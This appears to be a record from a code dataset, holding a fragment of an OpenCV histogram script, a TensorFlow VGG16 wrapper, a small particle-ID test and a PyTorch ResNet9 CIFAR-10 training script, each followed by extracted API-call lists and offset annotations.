# gray_hist = cv.calcHist([gray],[0],mask,[256],[0,256]) #calculate the histogram for the masked image
# plt.figure()
# plt.title("Grayscale histogram")
# plt.xlabel("Bins")
# plt.ylabel("No. of pixels")
# plt.plot(gray_hist)
# plt.xlim([0,256])
# plt.show()
#Coloured Histogram
mask = cv.circle(blank,(img.shape[1]//2,img.shape[0]//2),100,255,-1)
masked = cv.bitwise_and(img,img,mask=mask)
cv.imshow("Masked image",masked)
plt.figure()
plt.title("Color histogram")
plt.xlabel("Bins")
plt.ylabel("No. of pixels")
colors = ('b','g','r')
for i,col in enumerate(colors):
hist = cv.calcHist([img],[i],mask,[256],[0,256])
plt.plot(hist,color=col)
plt.xlim([0,256])
plt.show()
cv.waitKey(0)
cv.destroyAllWindows() | [
"matplotlib.pyplot.title",
"matplotlib.pyplot.xlim",
"cv2.circle",
"matplotlib.pyplot.show",
"cv2.bitwise_and",
"matplotlib.pyplot.plot",
"cv2.waitKey",
"cv2.destroyAllWindows",
"cv2.calcHist",
"numpy.zeros",
"cv2.imread",
"matplotlib.pyplot.figure",
"matplotlib.pyplot.ylabel",
"cv2.imshow... | [((248, 276), 'cv2.imread', 'cv.imread', (['"""Photos/cats.jpg"""'], {}), "('Photos/cats.jpg')\n", (257, 276), True, 'import cv2 as cv\n'), ((385, 424), 'numpy.zeros', 'np.zeros', (['img.shape[:2]'], {'dtype': 'np.uint8'}), '(img.shape[:2], dtype=np.uint8)\n', (393, 424), True, 'import numpy as np\n'), ((1029, 1099), 'cv2.circle', 'cv.circle', (['blank', '(img.shape[1] // 2, img.shape[0] // 2)', '(100)', '(255)', '(-1)'], {}), '(blank, (img.shape[1] // 2, img.shape[0] // 2), 100, 255, -1)\n', (1038, 1099), True, 'import cv2 as cv\n'), ((1100, 1135), 'cv2.bitwise_and', 'cv.bitwise_and', (['img', 'img'], {'mask': 'mask'}), '(img, img, mask=mask)\n', (1114, 1135), True, 'import cv2 as cv\n'), ((1134, 1167), 'cv2.imshow', 'cv.imshow', (['"""Masked image"""', 'masked'], {}), "('Masked image', masked)\n", (1143, 1167), True, 'import cv2 as cv\n'), ((1168, 1180), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (1178, 1180), True, 'import matplotlib.pyplot as plt\n'), ((1181, 1209), 'matplotlib.pyplot.title', 'plt.title', (['"""Color histogram"""'], {}), "('Color histogram')\n", (1190, 1209), True, 'import matplotlib.pyplot as plt\n'), ((1210, 1228), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Bins"""'], {}), "('Bins')\n", (1220, 1228), True, 'import matplotlib.pyplot as plt\n'), ((1229, 1256), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""No. of pixels"""'], {}), "('No. of pixels')\n", (1239, 1256), True, 'import matplotlib.pyplot as plt\n'), ((1417, 1427), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1425, 1427), True, 'import matplotlib.pyplot as plt\n'), ((1429, 1442), 'cv2.waitKey', 'cv.waitKey', (['(0)'], {}), '(0)\n', (1439, 1442), True, 'import cv2 as cv\n'), ((1443, 1465), 'cv2.destroyAllWindows', 'cv.destroyAllWindows', ([], {}), '()\n', (1463, 1465), True, 'import cv2 as cv\n'), ((1323, 1369), 'cv2.calcHist', 'cv.calcHist', (['[img]', '[i]', 'mask', '[256]', '[0, 256]'], {}), '([img], [i], mask, [256], [0, 256])\n', (1334, 1369), True, 'import cv2 as cv\n'), ((1369, 1394), 'matplotlib.pyplot.plot', 'plt.plot', (['hist'], {'color': 'col'}), '(hist, color=col)\n', (1377, 1394), True, 'import matplotlib.pyplot as plt\n'), ((1398, 1416), 'matplotlib.pyplot.xlim', 'plt.xlim', (['[0, 256]'], {}), '([0, 256])\n', (1406, 1416), True, 'import matplotlib.pyplot as plt\n')] |
"""A pre-trained implimentation of VGG16 with weights trained on ImageNet.
NOTE: It's not a great idea to use tf.constant to take in large arrays that will
not change, better to use a non-trainable variable.
https://stackoverflow.com/questions/41150741/in-tensorflow-what-is-the-difference-between-a-constant-and-a-non-trainable-var?rq=1
"""
##########################################################################
# Special thanks to
# http://www.cs.toronto.edu/~frossard/post/vgg16/
# for converting the caffe VGG16 pre-trained weights to TensorFlow
# this file is essentially just a restylized version of his vgg16.py
##########################################################################
from __future__ import print_function, absolute_import, division
import os
import numpy as np
from scipy.misc import imread, imresize
import tensorflow as tf
_debug = False
def pretrained_conv_layer(name, input_tensor, params):
r"""Creates a convolutional layer with
Args:
name: A `str`, the name for the operation defined by this function.
input_tensor: A `Tensor`.
diameter: An `int`, the width and also height of the filter.
in_dim: An `int`, the number of input channels.
out_dim: An `int`, the number of output channels.
"""
with tf.name_scope(name):
weights = tf.constant(params[name+'_W'])
biases = tf.constant(params[name+'_b'])
conv = tf.nn.conv2d(input=input_tensor,
filter=weights,
strides=[1, 1, 1, 1],
padding='SAME',
name='convolution')
preactivations = tf.nn.bias_add(conv, biases, name='bias_addition')
activations = tf.nn.relu(preactivations, name='activation')
return activations
def pretrained_fc_layer(name, in_tensor, params, sigmoid=tf.nn.relu):
with tf.name_scope(name):
weights = tf.constant(params[name+'_W'])
biases = tf.constant(params[name+'_b'])
preactivations = tf.nn.bias_add(tf.matmul(in_tensor, weights), biases)
activations = sigmoid(preactivations, name='activation')
return activations
class PreTrainedVGG16:
def __init__(self, weights=None, session=None):
if weights is not None and session is not None:
self.parameters = np.load(weights)
self.input_images = tf.placeholder(tf.float32, (None, 224, 224, 3))
self.activations = self._build_graph()
self.output = self.activations['fc8']
@staticmethod
def get_class_names():
with open('ImageNet_Classes.txt') as names_file:
return [l.replace('\n', '') for l in names_file]
def get_output(self, images, auto_resize=True):
""""Takes in a list of images and returns softmax probabilities."""
if auto_resize:
images_ = [imresize(im, (224, 224)) for im in images]
else:
images_ = images
feed_dict = {self.input_images: images_}
return sess.run(vgg.output, feed_dict)[0]
def get_activations(self, images, auto_resize=True):
""""Takes in a list of images and returns the activation dictionary."""
if auto_resize:
images_ = [imresize(im, (224, 224)) for im in images]
else:
images_ = images
feed_dict = {self.input_images: images_}
return sess.run(vgg.activations, feed_dict)[0]
def _build_graph(self):
parameters = [] # storage for trainable parameters
# pooling arguments
_ksize = [1, 2, 2, 1]
_strides = [1, 2, 2, 1]
# center the input images
with tf.name_scope('preprocess_centering'):
mean = tf.constant([123.68, 116.779, 103.939], dtype=tf.float32,
shape=[1, 1, 1, 3], name='img_mean')
c_images = self.input_images - mean
# images --> conv1_1 --> conv1_2 --> pool1
conv1_1 = pretrained_conv_layer('conv1_1', c_images, self.parameters)
conv1_2 = pretrained_conv_layer('conv1_2', conv1_1, self.parameters)
pool1 = tf.nn.max_pool(conv1_2, _ksize, _strides, 'SAME', name='pool1')
# pool1 --> conv2_1 --> conv2_2 --> pool2
conv2_1 = pretrained_conv_layer('conv2_1', pool1, self.parameters)
conv2_2 = pretrained_conv_layer('conv2_2', conv2_1, self.parameters)
pool2 = tf.nn.max_pool(conv2_2, _ksize, _strides, 'SAME', name='pool2')
# pool2 --> conv3_1 --> conv3_2 --> conv3_3 --> pool3
conv3_1 = pretrained_conv_layer('conv3_1', pool2, self.parameters)
conv3_2 = pretrained_conv_layer('conv3_2', conv3_1, self.parameters)
conv3_3 = pretrained_conv_layer('conv3_3', conv3_2, self.parameters)
pool3 = tf.nn.max_pool(conv3_3, _ksize, _strides, 'SAME', name='pool3')
# pool3 --> conv4_1 --> conv4_2 --> conv4_3 --> pool4
conv4_1 = pretrained_conv_layer('conv4_1', pool3, self.parameters)
conv4_2 = pretrained_conv_layer('conv4_2', conv4_1, self.parameters)
conv4_3 = pretrained_conv_layer('conv4_3', conv4_2, self.parameters)
pool4 = tf.nn.max_pool(conv4_3, _ksize, _strides, 'SAME', name='pool4')
# pool4 --> conv5_1 --> conv5_2 --> conv5_3 --> pool5
conv5_1 = pretrained_conv_layer('conv5_1', pool4, self.parameters)
conv5_2 = pretrained_conv_layer('conv5_2', conv5_1, self.parameters)
conv5_3 = pretrained_conv_layer('conv5_3', conv5_2, self.parameters)
pool5 = tf.nn.max_pool(conv5_3, _ksize, _strides, 'SAME', name='pool5')
# pool5 --> flatten --> fc1 --> fc2 --> fc3
shape = int(np.prod(pool5.get_shape()[1:]))
pool5_flat = tf.reshape(pool5, [-1, shape])
fc1 = pretrained_fc_layer('fc6', pool5_flat, self.parameters)
fc2 = pretrained_fc_layer('fc7', fc1, self.parameters)
fc3 = pretrained_fc_layer('fc8', fc2, self.parameters, tf.nn.softmax)
activations = {
'conv1_1': conv1_1, 'conv1_2': conv1_2, 'pool1': pool1,
'conv2_1': conv2_1, 'conv2_2': conv2_2, 'pool2': pool2,
'conv3_1': conv3_1, 'conv3_2': conv3_2, 'conv3_3': conv3_3, 'pool3': pool3,
'conv4_1': conv4_1, 'conv4_2': conv4_2, 'conv4_3': conv4_3, 'pool4': pool4,
'conv5_1': conv5_1, 'conv5_2': conv5_2, 'conv5_3': conv5_3, 'pool5': pool5,
'fc6': fc1, 'fc7': fc2, 'fc8': fc3
}
return activations
if __name__ == '__main__':
# Get input
input_images = [imread('testflash.jpg', mode='RGB')]
# Check 'vgg16_weights.npz exists
if not os.path.isfile('vgg16_weights.npz'):
raise Exception(
"The weights I use here were converted from the Caffe Model Zoo "
"weights by <NAME>. He didn't include a license so I'm "
"hesistant to re-post them. Please download them from his "
"website:\nhttp://www.cs.toronto.edu/~frossard/post/vgg16/")
# Build VGG16
if _debug:
sess = tf.InteractiveSession()
else:
sess = tf.Session()
vgg = PreTrainedVGG16('vgg16_weights.npz', sess)
# Run images through network, return softmax probabilities
from time import time
a = time()
class_probabilities = vgg.get_output(input_images)
print(time()-a)
# Get Class Names
class_names = vgg.get_class_names()
# Report results
top5 = (np.argsort(class_probabilities)[::-1])[0:10]
with open('results.txt', 'w') as f:
for p in np.argsort(class_probabilities)[::-1]:
f.write(str(class_probabilities[p]) + ' : ' + class_names[p] + '\n')
for p in top5:
print(class_probabilities[p], ' : ', class_names[p])
| [
"numpy.load",
"tensorflow.nn.relu",
"tensorflow.reshape",
"tensorflow.Session",
"tensorflow.constant",
"time.time",
"numpy.argsort",
"tensorflow.placeholder",
"tensorflow.nn.max_pool",
"scipy.misc.imread",
"os.path.isfile",
"tensorflow.nn.conv2d",
"tensorflow.matmul",
"scipy.misc.imresize"... | [((7226, 7232), 'time.time', 'time', ([], {}), '()\n', (7230, 7232), False, 'from time import time\n'), ((1296, 1315), 'tensorflow.name_scope', 'tf.name_scope', (['name'], {}), '(name)\n', (1309, 1315), True, 'import tensorflow as tf\n'), ((1335, 1367), 'tensorflow.constant', 'tf.constant', (["params[name + '_W']"], {}), "(params[name + '_W'])\n", (1346, 1367), True, 'import tensorflow as tf\n'), ((1383, 1415), 'tensorflow.constant', 'tf.constant', (["params[name + '_b']"], {}), "(params[name + '_b'])\n", (1394, 1415), True, 'import tensorflow as tf\n'), ((1430, 1540), 'tensorflow.nn.conv2d', 'tf.nn.conv2d', ([], {'input': 'input_tensor', 'filter': 'weights', 'strides': '[1, 1, 1, 1]', 'padding': '"""SAME"""', 'name': '"""convolution"""'}), "(input=input_tensor, filter=weights, strides=[1, 1, 1, 1],\n padding='SAME', name='convolution')\n", (1442, 1540), True, 'import tensorflow as tf\n'), ((1675, 1725), 'tensorflow.nn.bias_add', 'tf.nn.bias_add', (['conv', 'biases'], {'name': '"""bias_addition"""'}), "(conv, biases, name='bias_addition')\n", (1689, 1725), True, 'import tensorflow as tf\n'), ((1748, 1793), 'tensorflow.nn.relu', 'tf.nn.relu', (['preactivations'], {'name': '"""activation"""'}), "(preactivations, name='activation')\n", (1758, 1793), True, 'import tensorflow as tf\n'), ((1898, 1917), 'tensorflow.name_scope', 'tf.name_scope', (['name'], {}), '(name)\n', (1911, 1917), True, 'import tensorflow as tf\n'), ((1937, 1969), 'tensorflow.constant', 'tf.constant', (["params[name + '_W']"], {}), "(params[name + '_W'])\n", (1948, 1969), True, 'import tensorflow as tf\n'), ((1985, 2017), 'tensorflow.constant', 'tf.constant', (["params[name + '_b']"], {}), "(params[name + '_b'])\n", (1996, 2017), True, 'import tensorflow as tf\n'), ((2392, 2439), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32', '(None, 224, 224, 3)'], {}), '(tf.float32, (None, 224, 224, 3))\n', (2406, 2439), True, 'import tensorflow as tf\n'), ((4117, 4180), 'tensorflow.nn.max_pool', 'tf.nn.max_pool', (['conv1_2', '_ksize', '_strides', '"""SAME"""'], {'name': '"""pool1"""'}), "(conv1_2, _ksize, _strides, 'SAME', name='pool1')\n", (4131, 4180), True, 'import tensorflow as tf\n'), ((4400, 4463), 'tensorflow.nn.max_pool', 'tf.nn.max_pool', (['conv2_2', '_ksize', '_strides', '"""SAME"""'], {'name': '"""pool2"""'}), "(conv2_2, _ksize, _strides, 'SAME', name='pool2')\n", (4414, 4463), True, 'import tensorflow as tf\n'), ((4772, 4835), 'tensorflow.nn.max_pool', 'tf.nn.max_pool', (['conv3_3', '_ksize', '_strides', '"""SAME"""'], {'name': '"""pool3"""'}), "(conv3_3, _ksize, _strides, 'SAME', name='pool3')\n", (4786, 4835), True, 'import tensorflow as tf\n'), ((5144, 5207), 'tensorflow.nn.max_pool', 'tf.nn.max_pool', (['conv4_3', '_ksize', '_strides', '"""SAME"""'], {'name': '"""pool4"""'}), "(conv4_3, _ksize, _strides, 'SAME', name='pool4')\n", (5158, 5207), True, 'import tensorflow as tf\n'), ((5516, 5579), 'tensorflow.nn.max_pool', 'tf.nn.max_pool', (['conv5_3', '_ksize', '_strides', '"""SAME"""'], {'name': '"""pool5"""'}), "(conv5_3, _ksize, _strides, 'SAME', name='pool5')\n", (5530, 5579), True, 'import tensorflow as tf\n'), ((5706, 5736), 'tensorflow.reshape', 'tf.reshape', (['pool5', '[-1, shape]'], {}), '(pool5, [-1, shape])\n', (5716, 5736), True, 'import tensorflow as tf\n'), ((6522, 6557), 'scipy.misc.imread', 'imread', (['"""testflash.jpg"""'], {'mode': '"""RGB"""'}), "('testflash.jpg', mode='RGB')\n", (6528, 6557), False, 'from scipy.misc import imread, imresize\n'), ((6609, 6644), 'os.path.isfile', 'os.path.isfile', (['"""vgg16_weights.npz"""'], {}), "('vgg16_weights.npz')\n", (6623, 6644), False, 'import os\n'), ((7013, 7036), 'tensorflow.InteractiveSession', 'tf.InteractiveSession', ([], {}), '()\n', (7034, 7036), True, 'import tensorflow as tf\n'), ((7062, 7074), 'tensorflow.Session', 'tf.Session', ([], {}), '()\n', (7072, 7074), True, 'import tensorflow as tf\n'), ((2057, 2086), 'tensorflow.matmul', 'tf.matmul', (['in_tensor', 'weights'], {}), '(in_tensor, weights)\n', (2066, 2086), True, 'import tensorflow as tf\n'), ((2347, 2363), 'numpy.load', 'np.load', (['weights'], {}), '(weights)\n', (2354, 2363), True, 'import numpy as np\n'), ((3662, 3699), 'tensorflow.name_scope', 'tf.name_scope', (['"""preprocess_centering"""'], {}), "('preprocess_centering')\n", (3675, 3699), True, 'import tensorflow as tf\n'), ((3720, 3819), 'tensorflow.constant', 'tf.constant', (['[123.68, 116.779, 103.939]'], {'dtype': 'tf.float32', 'shape': '[1, 1, 1, 3]', 'name': '"""img_mean"""'}), "([123.68, 116.779, 103.939], dtype=tf.float32, shape=[1, 1, 1, 3\n ], name='img_mean')\n", (3731, 3819), True, 'import tensorflow as tf\n'), ((7298, 7304), 'time.time', 'time', ([], {}), '()\n', (7302, 7304), False, 'from time import time\n'), ((7405, 7436), 'numpy.argsort', 'np.argsort', (['class_probabilities'], {}), '(class_probabilities)\n', (7415, 7436), True, 'import numpy as np\n'), ((7507, 7538), 'numpy.argsort', 'np.argsort', (['class_probabilities'], {}), '(class_probabilities)\n', (7517, 7538), True, 'import numpy as np\n'), ((2873, 2897), 'scipy.misc.imresize', 'imresize', (['im', '(224, 224)'], {}), '(im, (224, 224))\n', (2881, 2897), False, 'from scipy.misc import imread, imresize\n'), ((3243, 3267), 'scipy.misc.imresize', 'imresize', (['im', '(224, 224)'], {}), '(im, (224, 224))\n', (3251, 3267), False, 'from scipy.misc import imread, imresize\n')] |
import numpy as np
import typicle
import graphicle
types_ = typicle.Types()
def test_pdgs():
pdg_vals = np.arange(1, 7, dtype=types_.int)
pdgs = graphicle.PdgArray(pdg_vals)
assert list(pdgs.name) == ["d", "u", "s", "c", "b", "t"]
| [
"graphicle.PdgArray",
"numpy.arange",
"typicle.Types"
] | [((63, 78), 'typicle.Types', 'typicle.Types', ([], {}), '()\n', (76, 78), False, 'import typicle\n'), ((113, 146), 'numpy.arange', 'np.arange', (['(1)', '(7)'], {'dtype': 'types_.int'}), '(1, 7, dtype=types_.int)\n', (122, 146), True, 'import numpy as np\n'), ((158, 186), 'graphicle.PdgArray', 'graphicle.PdgArray', (['pdg_vals'], {}), '(pdg_vals)\n', (176, 186), False, 'import graphicle\n')] |
import argparse
import numpy as np
import torch
import torch.nn as nn
from collections import namedtuple, OrderedDict
import torchvision as tv
import torch.nn.functional as F
from torch.utils.data import DataLoader, Dataset
from torch import optim
from functools import partial
import copy
from SGD import SGD
from core import (
normalise,
transpose,
pad,
preprocess,
PiecewiseLinear,
map_nested,
Timer,
group_by_key,
Table,
union,
Crop,
FlipLR,
flip_lr
)
from torch_backend import (
cifar10,
cifar10_mean,
cifar10_std,
cifar10_classes,
cov,
patches,
eigens,
to,
trainable_params,
Flatten,
Mul,
GhostBatchNorm,
GPUBatches,
)
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', type=str, default='./data')
parser.add_argument('--log_dir', type=str, default='.')
STEP = 0
torch.backends.cudnn.benchmark = True
class ConvBN(nn.Module):
def __init__(self, c_in, c_out, pool=None):
super().__init__()
self.conv = nn.Conv2d(c_in, c_out, kernel_size=3, stride=1, padding=1, bias=False)
self.pool = pool
self.bn = GhostBatchNorm(c_out, num_splits=16, weight_freeze=True)
self.relu = nn.CELU(alpha=0.3)
def forward(self, x):
out = self.conv(x)
if self.pool is not None:
out = self.pool(out)
out = self.bn(out)
out = self.relu(out)
return out
class WhiteningFilter(nn.Module):
def __init__(self, Λ, V, eps=1e-2):
super().__init__()
filt = nn.Conv2d(3, 27, kernel_size=(3,3), padding=(1,1), bias=False)
filt.weight.data = (V/torch.sqrt(Λ+eps)[:,None,None,None])
filt.weight.requires_grad = False
self.filt = filt
def forward(self, x):
return self.filt(x)
class WhiteningBlock(nn.Module):
def __init__(self, c_in, c_out, Λ=None, V=None, eps=1e-2):
super().__init__()
self.whitening = WhiteningFilter(Λ, V, eps)
self.layers = nn.Sequential(OrderedDict([
('conv', nn.Conv2d(27, c_out, kernel_size=(1, 1), bias=False)),
('bn', GhostBatchNorm(c_out, num_splits=16, weight_freeze=True)),
('relu', nn.CELU(alpha=0.3))
]))
def forward(self, x):
out = self.whitening(x)
out = self.layers(out)
return out
class Residual(nn.Module):
def __init__(self, c):
super().__init__()
self.conv1 = ConvBN(c, c)
self.conv2 = ConvBN(c, c)
def forward(self, x):
return x + self.conv2(self.conv1(x))
class ResNet9(nn.Module):
def __init__(self, weight, Λ, V):
super().__init__()
channels = [64, 128, 256, 512]
residuals = [False, True, False, True]
self.layers = []
self.layers.append(
WhiteningBlock(3, channels[0], Λ, V)
)
pool = nn.MaxPool2d(2)
for i in range(1, len(channels)):
self.layers.append(
ConvBN(channels[i-1], channels[i], pool=pool)
)
if residuals[i]:
self.layers.append(
Residual(channels[i])
)
self.layers.extend([
nn.MaxPool2d(4),
Flatten(),
nn.Linear(channels[-1], 10, bias=False),
Mul(weight)
])
self.layers = nn.ModuleList(self.layers)
def forward(self, x):
out = x
for layer in self.layers:
out = layer(out)
return out
def half(self):
for n, p in self.named_parameters():
if "bn" not in n:
p.data = p.data.half()
return self
class LabelSmoothingLoss:
def __init__(self, alpha):
self.alpha = alpha
def __call__(self, logits, targets):
log_probs = F.log_softmax(logits, -1, _stacklevel=5)
cross_entropy = F.nll_loss(log_probs, targets, reduction='none')
kl = -log_probs.mean(dim=-1)
loss = (1 - self.alpha) * cross_entropy + self.alpha * kl
return loss.sum()
class Transform(Dataset):
def __init__(self, dataset, device, transforms=None):
super().__init__()
self.data, self.targets = dataset["data"], dataset["targets"]
self.transforms = transforms
self.device = device
def __len__(self):
return len(self.data)
def __getitem__(self, index):
data, targets = self.data[index], self.targets[index]
if self.transforms:
data = self.transforms(data)
return data, targets
def update_ema(momentum, update_freq=1):
rho = momentum**update_freq
def step(step, model, ema_model):
if (step % update_freq) != 0: return
for v, ema_v in zip(model.state_dict().values(), ema_model.state_dict().values()):
if not v.dtype.is_floating_point: continue #skip things like num_batches_tracked.
ema_v *= rho
ema_v += (1-rho)*v
# for v, ema_v in zip(model.parameters(), ema_model.parameters()):
# if not v.dtype.is_floating_point: continue #skip things like num_batches_tracked.
# ema_v.data.mul_(rho)
# ema_v.data.add_(v.data, alpha=1-rho)
# for v, ema_v in zip(model.buffers(), ema_model.buffers()):
# if not v.dtype.is_floating_point: continue #skip things like num_batches_tracked.
# # ema_v.data.mul_(rho)
# # ema_v.data.add_(v.data, alpha=1-rho)
# ema_v.data.copy_(v.data)
return step
def zero_grad(model):
for param in model.parameters():
param.grad = None
def train(device, model, ema_model, train_batches, opts, lr_schedulers, loss_func):
ema_func = update_ema(0.99, 5)
train_meter = {
"loss": 0,
"acc": 0,
"n": 0
}
model.train()
ema_model.train()
global STEP
for batch in train_batches:
for opt, scheduler in zip(opts, lr_schedulers):
lr = scheduler(STEP)
for param_group in opt.param_groups:
param_group['lr'] = lr
inputs, targets = batch
inputs, targets = inputs.to(device), targets.to(device)
# inputs, targets = batch["input"], batch["target"]
logits = model(inputs)
loss = loss_func(logits, targets)
loss.backward()
for opt in opts:
opt.step()
# opt.zero_grad()
zero_grad(model)
train_meter["loss"] += loss.item()
train_meter["acc"] += (logits.max(dim=-1)[1] == targets).sum().item()
train_meter["n"] += inputs.shape[0]
ema_func(STEP, model, ema_model)
STEP += 1
train_meter["loss"] = train_meter["loss"] / train_meter["n"]
train_meter["acc"] = train_meter["acc"] / train_meter["n"]
del train_meter["n"]
return train_meter
def warmup_cudnn(loss_func, batch_sizes, device):
random_batch = lambda batch_size: {
'input': torch.Tensor(np.random.rand(batch_size,3,32,32)).cuda().half(),
'target': torch.LongTensor(np.random.randint(0,10,batch_size)).cuda()
}
random_data = torch.tensor(np.random.randn(1000,3,32,32).astype(np.float16), device=device)
Λ, V = eigens(patches(random_data))
model = ResNet9(weight=1/16, Λ=Λ, V=V).to(device).half()
for size in batch_sizes:
batch = random_batch(size)
inputs, targets = batch["input"], batch["target"]
logits = model(inputs)
loss = loss_func(logits, targets)
zero_grad(model)
loss.backward()
torch.cuda.synchronize()
@torch.no_grad()
def test(device, model, ema_model, test_batches, loss_func, tta=None):
meter = {
"loss": 0,
"acc": 0,
"n": 0
}
model.eval()
ema_model.eval()
for batch in test_batches:
inputs, targets = batch
inputs, targets = inputs.to(device), targets.to(device)
# inputs, targets = batch["input"], batch["target"]
if tta:
logits = torch.mean(torch.stack([ema_model(t(inputs)) for t in tta], dim=0), dim=0)
else:
logits = ema_model(inputs)
loss = loss_func(logits, targets)
meter["loss"] += loss.item()
meter["acc"] += (logits.max(dim=-1)[1] == targets).sum().item()
meter["n"] += inputs.shape[0]
meter["loss"] = meter["loss"] / meter["n"]
meter["acc"] = meter["acc"] / meter["n"]
del meter["n"]
return meter
if __name__ == "__main__":
device = "cuda"
args = parser.parse_args()
print('Downloading datasets')
dataset = map_nested(torch.tensor, cifar10(args.data_dir))
epochs, ema_epochs = 10, 2
lr_schedule = PiecewiseLinear([0, epochs/5, epochs-ema_epochs], [0, 1.0, 0.1])
batch_size = 512
train_transforms = tv.transforms.Compose([
# tv.transforms.RandomCrop(32, padding=4, padding_mode='reflect'),
tv.transforms.RandomCrop(32, padding=0, padding_mode='reflect'),
tv.transforms.RandomHorizontalFlip(p=0.5)
])
# train_transforms = [Crop(32, 32), FlipLR()]
loss_func = LabelSmoothingLoss(0.2)
print('Warming up torch')
warmup_cudnn(
loss_func,
[batch_size, len(dataset['valid']['targets']) % batch_size], # normal batch size and val last batch size
device
)
print('Starting timer')
timer = Timer(synch=torch.cuda.synchronize)
print('Preprocessing training data')
# dataset = map_nested(to(device), dataset)
# T = lambda x: torch.tensor(x, dtype=torch.float16, device=device)
T = lambda x: torch.tensor(x, dtype=torch.float32)
transforms = [
partial(normalise, mean=T(cifar10_mean), std=T(cifar10_std)),
partial(transpose, source='NHWC', target='NCHW'),
]
train_set = preprocess(dataset['train'], transforms + [partial(pad, border=4), to(dtype=torch.float16)])
Λ, V = eigens(patches(train_set['data'][:10000,:,4:-4,4:-4])) #center crop to remove padding
model = ResNet9(weight=1/16, Λ=Λ, V=V).to(device).half()
print(f'Finished in {timer():.2} seconds')
print('Preprocessing test data')
test_set = preprocess(dataset['valid'], transforms + [to(dtype=torch.float16)])
print(f'Finished in {timer():.2} seconds')
train_batches = DataLoader(Transform(train_set, device, train_transforms), batch_size, num_workers=4, shuffle=True, drop_last=True)
test_batches = DataLoader(Transform(test_set, device, None), batch_size, num_workers=4, shuffle=False, drop_last=False)
# train_batches = GPUBatches(batch_size=batch_size, transforms=train_transforms, dataset=train_set, shuffle=True, drop_last=True, max_options=200)
# test_batches = GPUBatches(batch_size=batch_size, dataset=test_set, shuffle=False, drop_last=False)
is_bias = group_by_key(('bias' in k, v) for k, v in trainable_params(model).items())
schedules = [
lambda step: lr_schedule((step+1)/len(train_batches))/batch_size,
lambda step: lr_schedule((step+1)/len(train_batches))*(64/batch_size)
]
opts = [
optim.SGD(is_bias[False], lr=schedules[0](0), weight_decay=5e-4*batch_size, momentum=0.9, nesterov=True),
optim.SGD(is_bias[True], lr=schedules[1](0), weight_decay=5e-4*batch_size/64, momentum=0.9, nesterov=True)
]
logs = Table()
ema_model = copy.deepcopy(model)
for epoch in range(1, epochs+1):
train_summary = train(device, model, ema_model, train_batches, opts, schedules, loss_func)
train_time = timer()
test_summary = test(device, model, ema_model, test_batches, loss_func, [lambda x: x, flip_lr])
test_time = timer(include_in_total=False)
log = {
"train": union({"time": train_time}, train_summary),
"test": union({"time": test_time}, test_summary),
"total time": timer.total_time
}
logs.append(union({"epoch": epoch}, log))
| [
"torch.cuda.synchronize",
"argparse.ArgumentParser",
"torch.sqrt",
"core.Table",
"torch.nn.CELU",
"numpy.random.randint",
"torch.no_grad",
"core.PiecewiseLinear",
"torch_backend.Mul",
"core.union",
"numpy.random.randn",
"torch_backend.trainable_params",
"torch.nn.functional.nll_loss",
"tor... | [((754, 779), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (777, 779), False, 'import argparse\n'), ((7683, 7698), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (7696, 7698), False, 'import torch\n'), ((8789, 8857), 'core.PiecewiseLinear', 'PiecewiseLinear', (['[0, epochs / 5, epochs - ema_epochs]', '[0, 1.0, 0.1]'], {}), '([0, epochs / 5, epochs - ema_epochs], [0, 1.0, 0.1])\n', (8804, 8857), False, 'from core import normalise, transpose, pad, preprocess, PiecewiseLinear, map_nested, Timer, group_by_key, Table, union, Crop, FlipLR, flip_lr\n'), ((9463, 9498), 'core.Timer', 'Timer', ([], {'synch': 'torch.cuda.synchronize'}), '(synch=torch.cuda.synchronize)\n', (9468, 9498), False, 'from core import normalise, transpose, pad, preprocess, PiecewiseLinear, map_nested, Timer, group_by_key, Table, union, Crop, FlipLR, flip_lr\n'), ((11411, 11418), 'core.Table', 'Table', ([], {}), '()\n', (11416, 11418), False, 'from core import normalise, transpose, pad, preprocess, PiecewiseLinear, map_nested, Timer, group_by_key, Table, union, Crop, FlipLR, flip_lr\n'), ((11436, 11456), 'copy.deepcopy', 'copy.deepcopy', (['model'], {}), '(model)\n', (11449, 11456), False, 'import copy\n'), ((1068, 1138), 'torch.nn.Conv2d', 'nn.Conv2d', (['c_in', 'c_out'], {'kernel_size': '(3)', 'stride': '(1)', 'padding': '(1)', 'bias': '(False)'}), '(c_in, c_out, kernel_size=3, stride=1, padding=1, bias=False)\n', (1077, 1138), True, 'import torch.nn as nn\n'), ((1182, 1238), 'torch_backend.GhostBatchNorm', 'GhostBatchNorm', (['c_out'], {'num_splits': '(16)', 'weight_freeze': '(True)'}), '(c_out, num_splits=16, weight_freeze=True)\n', (1196, 1238), False, 'from torch_backend import cifar10, cifar10_mean, cifar10_std, cifar10_classes, cov, patches, eigens, to, trainable_params, Flatten, Mul, GhostBatchNorm, GPUBatches\n'), ((1259, 1277), 'torch.nn.CELU', 'nn.CELU', ([], {'alpha': '(0.3)'}), '(alpha=0.3)\n', (1266, 1277), True, 'import torch.nn as nn\n'), ((1593, 1657), 'torch.nn.Conv2d', 'nn.Conv2d', (['(3)', '(27)'], {'kernel_size': '(3, 3)', 'padding': '(1, 1)', 'bias': '(False)'}), '(3, 27, kernel_size=(3, 3), padding=(1, 1), bias=False)\n', (1602, 1657), True, 'import torch.nn as nn\n'), ((2934, 2949), 'torch.nn.MaxPool2d', 'nn.MaxPool2d', (['(2)'], {}), '(2)\n', (2946, 2949), True, 'import torch.nn as nn\n'), ((3420, 3446), 'torch.nn.ModuleList', 'nn.ModuleList', (['self.layers'], {}), '(self.layers)\n', (3433, 3446), True, 'import torch.nn as nn\n'), ((3876, 3916), 'torch.nn.functional.log_softmax', 'F.log_softmax', (['logits', '(-1)'], {'_stacklevel': '(5)'}), '(logits, -1, _stacklevel=5)\n', (3889, 3916), True, 'import torch.nn.functional as F\n'), ((3942, 3990), 'torch.nn.functional.nll_loss', 'F.nll_loss', (['log_probs', 'targets'], {'reduction': '"""none"""'}), "(log_probs, targets, reduction='none')\n", (3952, 3990), True, 'import torch.nn.functional as F\n'), ((7308, 7328), 